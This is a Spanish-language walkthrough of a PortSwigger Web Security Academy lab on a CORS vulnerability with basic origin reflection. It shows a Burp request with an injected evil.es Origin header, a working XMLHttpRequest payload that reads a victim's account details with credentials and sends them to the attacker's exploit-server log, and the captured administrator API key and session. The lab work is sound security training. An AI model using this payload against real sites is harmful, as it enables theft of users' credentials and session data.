PortSwigger - CORS vulnerability with basic origin reflection
Primero veremos una pagina web en la que tendremos que loguearnos con las credenciales que nos proporcionan:
User: wiener
Pass: peterUna vez dentro veremos lo siguiente:
Ahora si nos vamos al HTTP History de BurpSuite veremos lo siguiente:
En esta parte de aqui, si nos vamos a la respuesta del servidor, veremos lo siguiente:
Vemos que está esta linea:
Access-Control-Allow-Credentials: truePor lo que ya nos esta dando una pista de que se puede inyectar un Origin: en la cabecera de la peticion, vamos a probarlo haciendo lo siguiente, pero antes lo enviaremos al Repeater para hacer nuestras pruebas con Ctrl+R:
GET /accountDetails HTTP/2
Host: 0ac200ae03914ae783adeb10005b0068.web-security-academy.net
Cookie: session=cqk6PNNi2yuPlScrp8epStylUJ6NSM5Q
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://0ac200ae03914ae783adeb10005b0068.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers
Origin: http://evil.es
Tiene que quedar algo asi como se muestra en lo anterior, ahora si lo enviamos y vemos la respuesta del servidor, veremos algo asi:
Vemos que esta funcionando, por que estamos viendo lo siguiente:
Access-Control-Allow-Origin: http://evil.es
Access-Control-Allow-Credentials: truePor lo que esta confiando en el link que le estamos inyectando en el Origin, ahora vamos a darle al boton llamado Go to exploit server para emular nuestro servidor atacante y realizar el exploit contra el usuario victima que este logueado, veremos este apartado:
En la parte de Body tendremos que meter el payload para poder capturar la informacion del usuario y obtener el TOKEN del mismo, vamos a poner lo siguiente:
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','<PETICION_VULNERABLE>',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='/log?key='+this.responseText;
};
</script>Ahora vamos a obtener la peticion vulnerable donde llevamos al repeater antes con BurpSuite copiandola, para asi insertarla ahi en ese payload y poder capturar el TOKEN del usuario que este logueado.
Y veremos algo asi:
URL = https://0ac200ae03914ae783adeb10005b0068.web-security-academy.net/accountDetailsEsto lo meteremos en nuestro payload y tendremos que tener algo asi:
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://0ac200ae03914ae783adeb10005b0068.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='/log?key='+this.responseText;
};
</script>Ahora para probar el exploit le daremos a Store y despues Deliver exploit to victim y nos vamos a los logs dandole a Access log, con esto veremos lo siguiente:
Veremos que hay un /log?key= que tiene el nombre de administrador por lo que vemos ha funcionado, vamos a obtener el valor entero que sera este:
/log?key={%20%20%22username%22:%20%22administrator%22,%20%20%22email%22:%20%22%22,%20%20%22apikey%22:%20%22cCPZoE0vdxZSEXbJzwB8XfmqOKrVU6mk%22,%20%20%22sessions%22:%20[%20%20%20%20%22jyoMkcVXMOZ22RmElbHuQBqps91se3Rf%22%20%20]}Ahora lo decodificaremos y veremos lo siguiente:
{ "username": "administrator", "email": "", "apikey": "cCPZoE0vdxZSEXbJzwB8XfmqOKrVU6mk", "sessions": [ "jyoMkcVXMOZ22RmElbHuQBqps91se3Rf" ]}Vemos que el APIKey del usuario administrador es:
cCPZoE0vdxZSEXbJzwB8XfmqOKrVU6mkAhora para validarlo le daremos a Submit Solution e introducimos ese APIKey con esto ya habremos terminado el LAB.
Last updated